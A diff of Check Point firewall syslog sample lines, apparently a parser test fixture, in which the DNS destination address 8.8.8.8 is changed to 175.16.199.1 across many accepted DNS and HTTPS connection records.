-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45694"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58751"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55055"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42942"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45694"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58751"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55055"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51708"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50b,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585505547"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53304"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e50b,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34546"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53906"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57263"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49422"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53906"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57263"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49422"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54576"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52064"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47527"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50c,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505548"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49151"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44720"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e50d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505549"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33553"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
